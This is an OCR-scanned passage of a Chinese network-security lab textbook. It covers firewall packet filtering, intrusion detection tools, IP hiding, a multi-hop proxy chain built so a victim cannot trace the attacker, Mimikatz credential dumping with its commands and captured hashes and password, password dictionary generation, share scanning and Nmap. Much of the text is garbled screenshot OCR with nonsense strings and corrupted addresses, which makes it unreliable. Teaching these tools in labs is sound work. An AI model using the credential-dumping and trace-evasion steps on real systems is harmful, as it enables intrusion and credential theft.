一 、 实 验 目 的 


用 WinRouteFirewall 5 创建 包 过 滤 规 则 : 禁止 使 用 ping 命令 ,禁用 FTP 访问 ,禁用 
HTTP 访问 。 


二 、 实 验 所 需 软件 


客户 机 操作 系统 : Windows 2000/Windows XP,IP, 地 址 为 192. 168. 2. 1 。 

服务 器 操作 系统 : Windows 2000 Advance Server/ Windows XP,IP 地 址 为 192. 168. 2. 2. 

抓 包 软件 : Sniffer 4. 7. 5/ wireshark-win32-1. 4. 9 中 文 版 。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : kerio-wrs-5. 0. 0-rc4-win. exe。 


三 、 实 验 步 又 
CD 一 个 可 靠 的 分 组 过 滤 防 火 墙 依赖 于 规则 集 , 以 下 定义 了 几 条 典型 的 规则 集 。 
第 一 条 规则 : 主机 10.1.1.1 任 何 端口 访问 任何 主机 的 任何 端口 ,基于 TCP 的 数据 包 
都 允许 通过 。 
第 二 条 规则 : 任何 主机 的 20 端口 访问 主机 10. 1.1.1 的 任何 端口 ,基于 TCP 的 数据 包 
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允许 通过 。 
第 三 条 规则 : 任何 主机 的 20 端口 访问 主机 10. 1.1.1 小 于 1024 的 端口 ,如 果 基 于 TCP 
的 数据 包 都 禁止 通过 。 
下 面 按照 规则 集 进 行 设置 ,首先 安装 软件 
(2) 安装 : 以 管理 员 身 份 在 服务 器 上 安装 该 软件 ,双击 kerio-wrs-5. 0. 0-rc4-win. exe, 
安装 界面 如 图 9-70 所 示 。 


-— 


9 WinRoute Firewall 5.0.0 RC 4 


Melcome to the InstalShield Wizard or Kerio 
Winfioute Fuemal 00 RC 4 


Th he? Wizard vil natal Kerio Wir 
Few S00 RC 4 on you compus Toc 
Nea 


E 
图 9-70 安装 界面 


(3) 启动 : 安装 完毕 后 ,启动 WinRoute Administration. WinRoute 的 管理 界面 如 图 9-71 
所 示 。 


'inRoute Administration 


Open Configuration ax 


Configuration 
Enter a hostname or an IP address of a computer 
running WinRoute - 


WinRoute Host [localhost - 


Username : [Admin 
Password : || 


CC] ces 


图 9-71 登录 界面 
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默认 情况 下 ,该 密码 为 空 。 单 击 OK 按钮 ,进入 系统 管理 。 当 系统 安装 完毕 以 后 ,该 主 
机 就 将 不 能 上 网 ,需要 修改 默认 设置 , 单 击 工 具 栏 图 标 ,出 现 本 地 网 络 设置 对 话 框 ,然后 查看 
Ethernet 的 属性 ,将 两 个 复 选 框 全 部 选中 ,如 图 9-72 所 示 。 


172. 18.25. 108 
0.0.0.0 


w | 
Interface Description —— — — — — — ————————— ——À, 
Name : [AMD PCNET Family Ethernet Ada 
Properties... | 本 oro address 172.18.25.109 


Mask : 255.255. 255. 0 
Ethernet jy address 00-0c-29-9c-c6-ed 


[Settings 


[V Perform NAT with the IP address of this 
interface on all communication passing 


- OBS s ceps i] 


图 9-72 更改 默认 设置 


(4) 利用 WinRoute 创建 包 过 滤 规 则 ,创建 的 规则 内 容 是 : 防止 服务 器 被 别 的 计算 机 使 
用 ping 指令 探测 。 
选择 菜单 项 Packet Filter, 如 图 9-73 所 示 。 


hinistration (localhost) 


图 9-73 选择 “ 包 过 滤 ” 菜 单项 


在 “ 包 过 滤 ” 对 话 框 中 可 以 看 出 目前 主机 还 没有 任何 的 包 规 则 ,如 图 9-74 所 示 。 
选中 图 9-74 中 的 网 卡 图 标 , 单 击 Add 按钮 ,出 现 “ 添 加 过 滤 规 则 ”对 话 框 ,所 有 的 过 滤 
规则 都 在 此 处 添加 ,如 图 9-75 所 示 。 
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ENP MND PCHET Family Ethernet Adapter 
| iM 


图 9-74 查看 过 滤 规 则 


图 9-75 添加 过 滤 规 则 


因为 ping 指令 用 的 是 ICMP, 所 以 这 里 要 对 ICMP 设置 过 滤 规 则 。 在 “协议 ”下 拉 列 表 
中 选择 ICMP ,如 图 9-76 所 示 。 


图 9-76 添加 ICMP 的 过 滤 规 则 
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在 ICMP Types 栏目 中 ,将 复 选 框 全 部 选中 。 在 Action 栏目 中 ,选择 Drop 单 选 框 。 在 
Log Packet 栏目 中 选中 Log into window, 创 建 完毕 后 单 击 OK 按钮 ,一 条 规则 就 创建 完毕 ， 
如 图 9-77 所 示 。 


图 9-77 ”编辑 过 滤 规 则 
为 了 使 设置 的 规则 生效 , 单 击 * 应 用 ?按钮 ,如 图 9-78 所 示 。 


p Fy PCHET Family Ethernet Adapter 


l- Dial in adapter 
OM linel 
| * Any interface 


图 9-78 ”使 规则 生效 


设置 完毕 ,客户 机 对 服务 器 使 用 ping 指令 时 ,服务 器 就 不 再 响应 外 界 的 ping 指令 了 ， 
使 用 ping 来 探测 主机 ,将 收 不 到 回应 ,如 图 9-79 所 示 。 

虽然 服务 器 没有 响应 ,但 是 已 经 将 事件 记录 到 安全 日 志 中 了 。 选 择 菜 单 栏 View 下 的 
菜单 项 Logs-~~Security Logs, 查 看 日 志 记录 。 

(5) 用 WinRoute 禁用 FTP 访问 

FTP 服务 用 TCP.FTP 占用 TCP 的 21 端口 ,服务 器 的 IP 地 址 是 192. 168. 2. 2 ,创建 
规则 如 表 9-2 所 示 。 
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[C:\Documents and Settings\hdministratoryping 192.168.2.2 


Pinging 192.168.2.2 with 32 bytes of data: 


timed out. 
timed out. 


Æ 9-79 ping 服务 器 
R 9-2 禁用 FTP 访问 


组 序号 动作 源 IP | 目的 了 源 端口 目的 端口 协议 类 型 
1 禁止 * | 192.168. 2. 2 * 21 TCP 


利用 WinRoute 建立 访问 规则 ,如 图 9-80 所 示 。 


ET — 到 
Packet De 
trotocol ERN T 
Source Destination 
Type : [Any address zj Type os 了 | 
IP Adàress[192. 168. 2. 2 
Port : [iay z] Porg fema ce Hk 
HTC Flags 


[ Only gsteblished TCP cennectior 
[^ Only establishing TCP connecti: 


Action Log Packet Valid at 
C Permit T Deist 
C Drop € inte £ Time [Qlrays) E: 
pad F Log into vindo 


caen 


9-80 设置 禁用 FTP 访问 规则 


设置 访问 规则 以 后 ,再 访问 服务 器 192. 168. 2. 2 的 FTP 服务 ,将 遭 到 拒绝 ,如 图 9-81 
所 示 。 如 果 访 问 违反 了 访问 规则 ,会 在 主机 的 安全 日 志 中 记录 下 来 。 

(6) 用 WinRoute 禁用 HTTP 访问 

HTTP 服务 用 TCP, 占 用 TCP 的 80 端口 ,服务 器 的 IP 地 址 是 192. 1368. 2. 2 ,首先 创 
建 规则 如 表 9-3 所 示 。 
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C:N»ftp 192.168.2.2 


> ftp: connect :连接 被 拒绝 
ftp? . 


图 9-81 访问 FTP 服务 
表 9-3 禁用 HTTP 访问 规则 


组 序号 动作 源 IP 目的 IP 源 端 口 目的 端口 协议 类 型 
1 禁止 * 192.168.2.2 * 80 TCP 


利用 WinRoute 建立 访问 规则 ,如 图 9-82 所 示 。 


[sum nmm 半 
p Packet Description 


vom 
Destination 
pcm Any address Type : [Host z] 
IF Adáress[192. 168. 2. 2 
Tert : [iy E Perg ifeq to c) — x][so0 


[7 Only gstablished TCP connection 
[Only establishing TCP connecti! 


[- Aeti on- Log Packet Valid at. 
io T7 Loc into £ 
Ti " 
Cx E date gi ine | Mivays) zi 


[ox] emm | 
Hi9-82 禁用 HTTP 访问 规则 


打开 本 地 的 TE 连接 远程 主机 的 HTTP 服务 ,将 遭 到 拒绝 ,如 图 9-83 所 示 。 访 问 违反 
了 访问 规则 ,所 以 在 主机 的 安全 日 志 中 记录 下 来 。 


TND RO EID SPRO TAO 2RD. 


$9»59 
KORA Bree Dole XURERHE 


BO Oe- mv- rto- TAV- O 


x Internet Explorer 无 法 显示 该 网 页 


sss pae 

O SIRERE teret, GER ET OBRSROR temet, 
* amoun, 

a 


[d 
* SEMI Intenet. 


放风 站 天 了 万 
^ ERE MR. 


© menm 


图 9-83 不 能 打开 服务 器 的 网 页 
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实验 12 入侵 检测 系统 工具 BlackICE 
fil" vk zz HR" 


一 、 实 验 目 的 
利用 工具 BlackICE 和 *“ 冰 之 眼 ” 对 网 络 情况 进行 实时 检测 。 
二 、 实 验 所 需 软 件 


CD 操作 系统 : Windows XP. Windows Server, 
(2) 工具 软件 : bidserver. exe 和 * 冰 之 腿 ”。 


三 、 实 验 步 骤 


(D) BlackICE: 双击 bidserver. exe, 如 图 9-84 所 示 ,在 安装 过 程 中 需要 输入 序列 号 ,如 
图 9-85 所 示 ,序列 号 在 ROR. NFO 文件 中 。 


bidserver. exe 
| BlackICE Intrusi 
SN Wetwork ICE 


图 9-84 安装 文件 


Hetwork ICE BlackICE Setup Server Version 2.9.car 
BlackICE Server License. 


Erias he Nolo ICE Boente ko fayo aan "Your license key is the field labeled. 
Serial Number on your Receipt and Proof of 


License — [SEE92A2RSE4495 


9-85 ”输入 序列 号 


BlackICE 是 一 个 小 型 的 入 侵 检测 工具 ,在 计算 机 上 安装 完毕 后 ,会 在 操作 系统 的 状态 
栏 右 下 角 显示 一 个 图 图 标 , 当 有 异常 网 络 情况 的 时 候 , 图 标 就 会 跳动 。 其 主 界面 如 图 9-86 
所 示 。 在 Events 选项 卡 下 显示 网 络 的 实时 情况 ,选择 Intruders 选项 卡 ,可 以 查看 主机 入侵 
的 详细 信息 ,如 IP、.MAC、DNS 等 ,如 图 9-87 所 示 。 


Be LÀ yew los "eb 
国 perm 


DIDIT ere BESE an 
Æ 9-86 BlackICE 的 主 界面 


-aa 
Bs Edt View Tools Help 
Events Intruders ]istor] 


182.168.1.6 


IP. 192.168.1.9 
ode: WIN2000-SRV-! 


DE | ue | 4 
图 9-87 查看 入 侵 者 的 详细 信息 


(2) 冰 之 眼 :“ 冰 之 眼 ? 网 络 人 侵 检测 系统 是 NSFOCUS 系列 安全 软件 中 的 一 款 专门 针 
对 网 络 遭 受 黑 客 攻 击 行为 而 研制 的 网 络 安全 产品 ,该 产品 可 最 大 限度 地 .全天候 地 监控 企业 
级 的 安全 。 双 击 图 9-88 中 的 autorun. exe 文件 安装 , 先 选择 安装 冰 之 眼 公 共 库 ,如 图 9-89 
所 示 ,然后 安装 冰 之 眼 控制 台 。 

安装 成 功 后 就 可 以 在 程序 中 执行 ,如 图 9-90 所 示 ,控制 台 启 动 成 功 后 如 图 9-91 所 示 ， 
系统 管理 人 员 可 以 自动 地 监控 网 络 的 数据 流 、 主 机 的 日 志 等 ,对 可 疑 的 事件 给 予 检测 和 响 
应 ,在 内 联网 和 外 联网 的 主机 和 网 络 遭 受 破坏 之 前 阻止 非法 的 入 侵 行为 。 
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IDBPSdk 


C IDSAgentForlinZk l^ ] mspsse 
m IDSConsole - IDSFirewall Adapter 
autorun. exe autorun. ico 
冰 之 眼中 央 控 制 台 
绿 盟 科技 9.0 IC0 图 像 
Ta, autorun. inf 
三 安装 信息 
一 1 KB 


图 9-88 ”安装 所 需要 的 文件 


BIDEN 2A UONCEAR (AUE) 
nild20020421 Tastalishieid Pirard 


Miara SEDULO por 
ARR uldsnne0t2T， AGB 


LE 
dnm 
Ret ES) 


EE IDE e n 


图 9-89 安装 冰 之 眼 公共 库 


g 
3] 
s 
2 
E 
o 
E 


图 9-90 启动 冰 之 眼 控制 台 


sam cu má mess (memusm E Cu LU aoc) m 


图 9-91 冰 之 眼 软件 主 界面 


实验 13 IP 隐藏 工具 Hide IP Easy 


、 实 验 目 的 

隐藏 真实 IP, 防 止 网 上 活动 被 监视 或 个 人 信息 被 黑客 窃取 。 
二 、 实 验 所 需 软 件 

CD 操作 系统 : Windows XP, Windows Server, 

(2) 工具 软件 : HideIPEasy。 
=, ZPR 

安装 所 需要 的 软件 如 图 9-92 HEAR Iii HidelPEasy. exe 文件 安装 ,安装 界面 如 图 9-93 
所 示 ,启动 界面 如 图 9-94 所 示 , 单 击 Hide IP 按钮 可 以 隐藏 本 地 的 IP. 


i- HidelPEasy.rar — WinRAR 
XPD AFO IRO KERO 选项 四 HHW 


EELEILTELIES 


iR deIPEasy. rar - RAR 压缩 文件 ， 解 包 大 小 为 4, 615, 531 F 


E 使 用 更 新 说 明 . txt 

E Pcs 下 载 站 .htn 
[hi deIPEasy. exe 3,814,712 
国 ffextension xpi 4,545 
É const. dat 1,538 


总 计 3 XR 和 3,670,661 FP G 个 文件 ) 


9-92 ”安装 需要 的 软件 
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W Hide IP Easy 5.3.3.6 Setup 


Welcome to the Hide IP Easy Setup 
Wizard 


This wizard wil guide you through the installation of Hide IP. 
Easy 5.3.3.6 


Click Next to continue. 


图 9-93 安装 界面 


Verifying from Hide IP Easy server... 


G E Hch on Srt 
"T" | E] change P Every [10 B minutes 


9-94 ”启动 界面 


实验 14 ”利用 跳板 网 络 实现 网 络 隐身 


很 多 防火 墙 或 IDS 有 追溯 功能 , 即 可 以 通过 代理 跳板 主机 找到 真实 黑客 的 功能 。 不 过 
这 种 功能 有 追溯 层 数 的 限制 ,一旦 代理 跳板 的 层 数 超过 防火 墙 或 人 侵 检 测 系统 追溯 层 数 的 
设置 时 ,受害 主机 还 是 无 法 发 现 真实 的 黑客 。 所 以 ,一 方面 黑客 需要 不 断 地 找到 多 个 代理 跳 
板 以 构成 尽量 多 层次 的 代理 网 络 , 另 一 方面 受害 主机 的 防火 墙 和 入 侵 检测 系统 也 要 设置 尽 
量 高 的 追溯 层 数 来 对 付 黑客 。 


一 、 实 验 目的 
了 解 并 掌握 二 级 跳板 及 多 级 跳板 (跳板 网 络 ) 的 制作 方法 ,掌握 跳板 网 络 形成 后 黑客 主 


a 
Koe] 
+ 
bii 
$ 
2 
它 


机 对 受害 主机 的 访问 效果 。 
、 实 验 设备 


5 f Windows 2003 主机 ,192. 168. 5. 9 为 受害 机 ,192. 168. 5. 5 为 黑客 机 ,192. 168. 5. 6 
为 一 级 跳板 ,192. 168. 5. 7 为 二 级 跳板 ,192. 168. 5. 8 为 三 级 跳板 。 


、 实 验 步 又 


(1) 黑客 机 上 安装 SkServer 服务 ,并 设置 开启 服务 。 
(D 找到 Sksockserver. exe 所 在 的 目录 ,输入 “Sksockserver. exe-install”。 
© 输入 “sksockserver-config port 10000”。 


Hu 


© fiij A" sksockserver-config starttype 2 


CD 输入 “net start skserver”( 配 置 见 图 9-95), 


C:\Documents and Settings\hdministrator>CDN\ 
iC: NDNET START SKSERUER 


Simple TCP Service 


9-95 ”安装 跳板 服务 器 


(2) 在 一 级 跳板 机 上 ,运行 skservergui. exe, 打 开 skservergui 服务 , 单 击 “ 配 置 " 菜 单一 
“经 过 的 SkServer”, 把 三 级 跳板 添加 进去 ,端口 为 1813,E 允许 ,配置 如 图 9-96 所 示 。 


ol PE TE axi 


Segu [IP Pot — [Active [Desc 
0 192.168.5.6 1813 Y 
1 192.168.5.7 1813 T 
2 192.168.5.8 1813 Y 


XP [192.169.5.8 BKO [e fv Bg VE 移 
s ud 


sm | wem| omes] | cen] 


图 9-96 设置 一 级 代理 服务 器 
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(3) 在 二 级 跳板 机 上 真实 机 环境 的 界面 下 运行 Skservergui. exe 程序 ,打开 skservergui 
服务 , 单 击 * 配 置 ? 菜 单一 "经 过 的 SkServer”, 把 本 机 和 三 级 跳板 添加 进去 ,端口 为 1813,E 
允许 ,配置 如 图 9-97 所 示 。 


图 9-97 设置 二 级 代理 服务 器 


(4) 在 准备 成 为 三 级 跳板 的 主机 上 安装 SkServer 服务 ,并 设置 开启 服务 。 

(D 输入 “sksockserver-install”。 

@ 输入 “net start skserver”。 

(5) 在 黑客 机 上 ,打开 skservergui 服务 , 单 击 “ 配 置 ” 菜 单 ~“ 经 过 的 SkServer”, 把 三 级 
跳板 添加 进去 ,端口 为 1813,E 允许 ,配置 如 图 9-98 所 示 。 之 后 保存 设置 ,重启 服务 。 


图 9-98 设置 三 级 代理 服务 器 


(6) 在 黑客 机 上 使 用 Sockservercfg 制作 代理 网 络 。 
(D 在 黑客 机 上 运行 并 打开 Sockservercfg“ 经 过 的 跳板 ”选项 卡 , 在 此 处 依次 添加 跳 
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板 的 IP、 端 口号 (将 三 级 跳板 的 IP 地址 和 端口 加 入 ) ,选择 “E 允许 "一 确定 ,如 图 9-99 
所 示 。 


Snake 的 sock 代 理 一 设置 程序 


图 9-99 黑客 机 上 使 用 Sockservercfg 制作 代理 网 络 


@ 重启 黑客 本 机 的 SkServer 服务 。 

(7) 测试 。 

CD 黑客 机 在 Sockscap 界面 中 双击 IE, 在 IE 地 址 栏 中 输入 受害 主机 的 IP( 受 害 主机 事 
先 设置 了 Web 共享 ) ,访问 成 功 , 如 图 9-100 所 示 。 


建设 中 
ZEEREDUASRESKUR. TEIXHZROARCMNENG. 


GEWSBOHIOLA. MRENMBDAN, IBSEIUDSST IER. 


JORCAFIGDESR , 7 BUT AUCHEUCDRSUCAB | WSA 115 
Ata BARMEN. 


要 访问 IIS Wu 


i BER. NASHE. 
在 打开 文本 检 中 MA inetagr. HEN I E. 
3 MEDE, i 

4 单 击 Tateraet MARS. 


图 9-100 访问 受害 主机 的 IP 


© 受害 主机 在 自己 的 DOS 命令 行 中 运行 “netstatran”, 无 法 发 现 真正 的 黑客 机 
192. 168. 5. 5 与 其 80 端口 相连 的 任何 迹象 (只 能 发 现代 理 跳板 主机 192. 168. 5. 8 与 受害 机 
的 80 端口 相连 ) ,如 图 9-101 所 示 。 
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C:\Documents and Settings\Adninistratornetstat -an 
Active Connections 


Proto 
TCP 
TCP 
TCP 
TCP 
TCP 


State 

LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
LISTENING 
TIME_WAIT 
TIME_WAIT 
LISTENING 


Domo 


F 
a 
a 
a 
a 
a 
a 
a 
1 
1 
a 
* 
L 
*: 


C:\Documents Settings Administrator), 


9-101 验证 


实验 15 ”密码 破解 工具 Mimikatz 
一 、 实 验 目的 


扫描 要 攻击 的 主机 的 用 户 名 和 
Jy" ji ii 


码 , 若 用 户 已 设置 登录 密码 可 以 使 用 指定 
码 或 字典 生成 器 (实验 16 介绍 ), 从 而 得 到 受 攻击 的 主机 的 用 户 名 和 密码 。 
二 、 实 验 所 需 软件 


(1) 客户 机 操作 系统 : Windows 10 之 前 的 任何 Windows 系统 。 
(2) 工具 软件 : Mimikatz。 


CD 以 管理 员 身 份 运行 Mimikatz. exe. Wh A| 9-102 所 示 o 


图 9-102 软件 界面 


(2) 输入 命令 *privilege: :debug” 提 升 权 限 ,如 图 9-103 所 示 。 
Ce 


ninikatz # privilege::debug 
Privilege '20' OK 


inimikatz # 


图 9-103 提升 权限 
(3) 输入 命令 “sekurlsa: :logonpasswords” 抓 取 密 码 ,扫描 结果 如 图 9-104 Bro 。 


Oninikatr 2.0 alpha zx86 =| 口 xj 
* Domain ，: WORKGROUP [^] 
vord <null) 


Authentication Id : 8 ; 192847 ‘(886808808:9002f14F> 

Sessi nteractive from 
idninistrator 
WURNGEW 
71-5-21-1721293517-2743261148-798124| 


080021 Prinary 
Username : Administrator 
WANGFY 
1319b8fa23c89£2dff17365faf1ffe89 
8a640404b5c386ab12092587fe19cd892 
: cic5df70d25474d43e891bed?c4081775897| 


Administrator 
URNGFU 
queri234 


fidninistrator 
JRNGEFW 
queri234 


9-104 获取 密码 


总 结 : 该 工具 简单 有 效 ， 


实验 16 ”Superdic( 超 级 字典 文件 生成 器 ) 


一 、 实 验 目 的 


学 会 使 用 超级 
解密 码 的 软件 使 用 。 


二 、 实 验 所 需 软件 


(1) 系统 要 求 : Windows XP/all。 
(2) 工具 软件 : superdic. exe。 


、 实 验 步 又 


(1) 打 开 superdic. exe, 如 图 9-105 所 示 。 


典 文件 生成 器 生成 需要 的 密码 字典 ,从 而 提供 给 需要 利用 密 在 


lu 
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DL 易 优 软 件 一 起 级 字典 生成 器 V3.2 (未 注册 ) 
GR dese | Bex | 生日 | 生成 宇 奥 | 修改 字典 | 注册 | 


BIBT ASSELADR: 
BEXEASEUS, MIETAREDA, 
Pod ge 


E SEO 息 和 用 位 讼 和 sc30) 可 
i 


HOME: EUsoft 126.com fü: ru 
E- Mail: EUsoft&153 com d 


图 9-105 superdic 的 主 界面 
(2) 可 以 选择 的 字典 内 容 如 图 9-106 所 示 ,选择 在 密码 中 可 能 有 的 密码 ,如 图 9-107 和 
图 9-108 所 示 。 


Dn 易 优 软件 一 超级 字典 生成 器 73. 2 (未 注册 )》 


r:rere 


rTerxrri 
rerars 
Ferari 
IEE 


图 9-106 字典 内 容 


PE 易 优 软件 一 超级 宁 典 生成 器 Y3- 2 (REM) 
基本 字符 | 自 定义 | 生日 “| 生成 字典 | 修改 字典 | 注册 


kaj 
o 


v2 Femte RKS 


ps 
vr 
vv 
Mb 
ivi 


Vv 


aaa XE XI 

saa s 

aaqa aq 
$ CNET Rg 


LAA 


v 
v 
F 
ju 
r 
Fs 
r 


Eb 


图 9-107 选择 上 的 字典 内 容 
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M 易 优 软件 一 超级 宁 和 生 成 恬 Y3- 2 (未 注册 ) 
XF | 基本 字符 | 自 定义 生日 ”| 生成 字 奥 | 修改 字典 | 注册 | 


范围 - 
初始 年 份 。 [ero mha fi 
SEF [1990 终止 月 份 f2 


模式 一 以 生日 1961 年 6 月 9 日 为 例 

年 月 日 610609) 

月 日 年 (080981) 
年 日 (198109) 
ER H 1961/05/09) 
AAF (09081981) 
THEHH 6189) 


A B (1881.08. 09) 
H A (1981-08-09) 
A 


XIXI XI XL XH XI 


图 9-108 选择 生日 作为 字典 内 容 
(3) 选择 生成 字典 的 存档 位 置 如 图 9-109 所 示 。 


了 易 优 软件 一 起 级 字典 生成 器 73. 2 (未 注册 ) 
关于 ”| 基本 字符 | 自 定义 | 生日 生成 字典 | 修改 字典 | 注册 | 


保存 路 径 : [c: Vsuperdic. txt mmo 


密码 位 数 rirersrarsrer: vB 


EN 


9-109 ”生成 字典 的 存档 位 置 


(4) 也 可 以 修改 密码 字典 ,如 图 9-110 所 示 。 注 意 事项 : 如 果 选 择 的 内 容 比较 多 ,生成 
的 字典 文本 占 的 存储 空间 会 比较 大 ,如 图 9-111 所 示 。 


M 易 优 软件 一 超级 字典 生成 器 73. 2 (未 注册 ) 
关于 ”| 基本 字符 | 自 定义 | 生日 “| 生成 字典 修改 字典 | 注册 | 


rs FH e 
F 在 每 个 密码 后 插入 字符 串 


源 字 典 路 径 [C: \superdie. txt UE. 
保存 路 径 Nsoperdicitzt 浏览 


mg] 


图 9-110 ”修改 密码 字典 
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j F2 易 优 软 件 一 超级 字典 生成 器 V3.2 (未 注册 ) 


XF | 基本 字符 | 目 定义 | 生日 。 生成 字典 | 修改 字 奥 | 注册 | 


易 优 软件 -- 超 级 字典 生成 器 
根据 您 的 选择 
de 
字典 大 小 6. 99GB 
您 的 c 盘 现 有 目 由 空间 6. 2068 


悠 的 磁盘 没有 足够 的 空间 , 请 缩小 生成 字典 或 更 换 驱动 器 !1 


图 9-111 生成 大 的 密码 字典 
(5) 也 可 以 修改 字典 生成 比较 小 的 密码 字典 文本 ,元 余 的 字符 最 好 少 些 。 
总 结 : 这 类 生成 字典 的 软件 比较 容易 操作 ,密码 字典 内 容 根据 个 人 需要 添加 时 减少 不 
必要 的 字符 ,节省 存储 空间 并 且 加 快 密码 生成 的 速度 。 


实验 17 共享 目录 扫描 Shed 


一 、 实 验 目 的 
学 会 利用 工具 软件 Shed 来 扫描 对 方 的 计算 机 提供 哪些 目录 共享 。 
二 、 实 验 所 需 软件 


客户 机 操作 系统 : Windows 2000/Windows XP,IP 地 址 为 172. 19. 25. 1 。 

服务 器 操作 系统 : Windows 2000 Advance Server/ Windows XP.IP 地 址 为 172. 19. 25. 10. 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 

工具 软件 : 共享 扫描 器 Shed. exe. 
三 、 实 验 步骤 

(1) 打开 Shed. exe, 如 图 9-112 所 示 。 

(2) 设置 起 始 IP 为 172.19.25.1, 终 止 IP 为 172.19.25.255, 查 找 这 一 网 段 中 存在 的 主 
机 , 单 击 “ 开 始 ” 按 钮 开始 扫描 ,扫描 结果 如 图 9-113 所 示 。 

结果 显示 扫描 出 来 IP 地 址 下 的 计算 机 C 盘 是 默认 隐 式 共享 ,实验 中 Windows XP 可 
以 扫描 Windows 2000 Server. Windows 20000 Advanced; Windows 2000 Server 可 以 扫描 
Windows 2000 Advanced, 
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S Shed 1.01 http://keir.net 


seta IP: |172 .19 .25 .1 
fub re [172.19 .25 — c: 


发 现 的 共享 资源 : E sec 验证 扫描 : 


EN 


潜在 目标 : mum 
pied ILLE 选项 @) | XFW 


93112 ”软件 主 界面 


S Shed 1.01 http://keir.net 


起 始 IP: [172.19 .25 .1 
Sk IP: [172.19 .25 .255 域名 >IF LL) 


发 现 的 共享 资源 : Ex E19] go 验证 扫描 ; 


Es 172. 19. 25. 102 ~ WINZ000-SRV-VW 
weh IFC$ [远程 IFC] 
ERE wns 【远程 管理 ] 
BRI cs [默认 共享 ] 

EM 172. 19. 25. 103 - IS"ADSERVER 
t IFCS [远程 IPC] X 
EE ADMINS [远程 管理 ] 
EE C$ [默认 共享 ] 


acum [3 WE 359] 0 | 


图 9-113 扫描 出 来 的 结果 


实验 18 ”开放 端口 扫描 Nmap 


一 、 实 验 目 的 
学 会 使 用 工具 软件 Nmap 得 到 对 方 计算 机 开放 的 端口 ,为 攻击 做 好 准备 。 
二 、 实 验 所 需 软件 


客户 机 操作 系统 : Windows 2000/ Windows XP/Windows 10,IP 地 址 为 192. 168. 1. 100。 
服务 器 操作 系统 : Windows 2003 Advance Server/ Windows 7,IP 地 址 为 192. 168. 1. 2. 
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实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 


Advance Server/ Windows 7, 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 
工具 软件 : Nmap 


三 、 实 验 步 又 


CD 首先 从 网 站 www. nmap. org 下 载 Nmap 的 安装 包 , 最 新 版 本 为 7.01。 
(2) 下 载 回来 ,双击 即 可 弹出 软件 的 安装 界面 ,如 图 9-114 所 示 。 


(9 Nmap Setup 


- x 
License Agreement 
Please review the license terms before instaling Nmap. [77] 


Press Page Down to see the rest of the agreement. 


[COPYING — Describes the terms under which Nmap is distributed. 


m» 


IMPORTANT NMAP LICENSE TERMS. 


[The Nmap Security Scanner is (C) 1996-2015 varare. Qn LC, Nmap is also a 
trademark of Insecure.Com. 


1f you accept the terms of the agreement, dick I Agree to continue. You must accept the 
agreement to install Nmap. 


Nullsoft Install System v2.47. 


Due] | cre | 
图 9-114 开始 安装 界面 
(3) 这 里 可 以 选择 安装 上 哪些 功能 ,如 果 没 有 特别 的 需求 ,默认 即 可 ,如 图 9-115 所 示 。 


(9 Nmap Setup. - x 
Choose Components. 
Choose which features of Nmap you want to install [7] 


the components you want to install and uncheck the components you don't want to 
e rrai 


Select components to install: 


Space required: 80. 5M8 


Nullsoft Install System v2.47. 


«Bk | Next> | | Canc 


图 9-115 功能 选择 界面 


(4) 选择 软件 安装 的 位 置 ,需要 的 空间 不 大 ,默认 即 可 ,如 图 9-116 所 示 。 
(5) 继续 安装 并 提示 相关 的 软件 依赖 包 的 关联 ,如 图 9-117 所 示 。 
(6) 安装 完成 后 提示 已 经 完成 安装 ,如 图 9-118 所 示 。 
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(9 Nmap Setup 一 口 X 
Choose install Location 
Choose the folder in which to install Nmap. [$7] 


Setup will install Nmap in the following folder. To install in a different folder, dick Browse and 
select another folder. Click Install to start the installation. 


Destination Folder 
lE: Program Fies Ce) mao] ] | Browse... | 


Space required: 80. 5MB 
Space available: 26,768. 


Nullsoft Install System v2.47 


«Back Install Cancel. 
图 9-116 安装 路 径 选 择 


@ Nmap Setup 一 


Installing 
Please wait while Nmap is being installed. o 


Execute: "C:\Program Files (x86) Nmap Winpcap-nmap-4. 13.exe" 


WinPcap (Nmap) 4.1.3 Setup 


Skipping WinPcap installation since version 4.1.0.2980 already exists on 
this system. Uninstall that version first if you wish to force install. 


Nullsoft Install System v2,47 


图 9-117 安装 WinPcap 


Finished 
Thank you for instaling Nmap [7] 


Nmap has been installed on your computer. 


Click Finish to dose this wizard. 


Nullsoft Install System v2.47 


E 
图 9-118 安装 完成 


240 计算 机 网 络 安全 与 实验 教程 (第 二 版 ) 


CD 进入 命令 窗口 ,输入 “nmap”, 可 以 看 到 Nmap 的 帮助 信息 ,说 明 安 装 成 功 ,如 
图 9-119 所 示 。 
Bi 命令 提示 符 =- B0 x 


icrosoft Windows [hRÆ@ 10. 0. 10240] 
(c) 2015 Microsoft Corporation. All rights reserved. 


:AUsersWangFW^nmap 

Imp 7.01 ( https://nmap. org ) 

sage: nmap [Scan Type(s)] [Options] (target specification) 

ARGET SPECIFICATION: 

Can pass hostnames, IP addresses, networks, etc. 

Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-25 


-iL <inputfilename): Input from list of hosts/networks 
-iR num hosts»): Choose random targets 
--exclude «hostl[, host2] [, host3] Exclude hosts/networks 


图 9-119 Nmap 帮助 信息 


(8) 单 击 桌面 上 的 快捷 方式 即 可 启动 Nmap 安全 扫描 工具 了 ,如 图 9-120 所 示 。 
$ Zenmap - B0 x 

BRD IAD REO 帮助 (H) 

目标 || EB (Intense scan ~| ime BE 


命令 ”| nmap -T4 -A -v 


主机 服务 Nmap 输 出 黄 口 /主机 拓扑 主机 明细 Ai 


操作 系统 € 主机 - 明细 


ner 
9-120 Nmap 运行 界面 


(9) Nmap 简单 扫描 。 

Nmap 默认 发 送 一 个 ARP 的 ping 数据 包 ,来 探测 目标 主机 在 1 一 10 000 范围 内 所 开放 
的 端口 。 

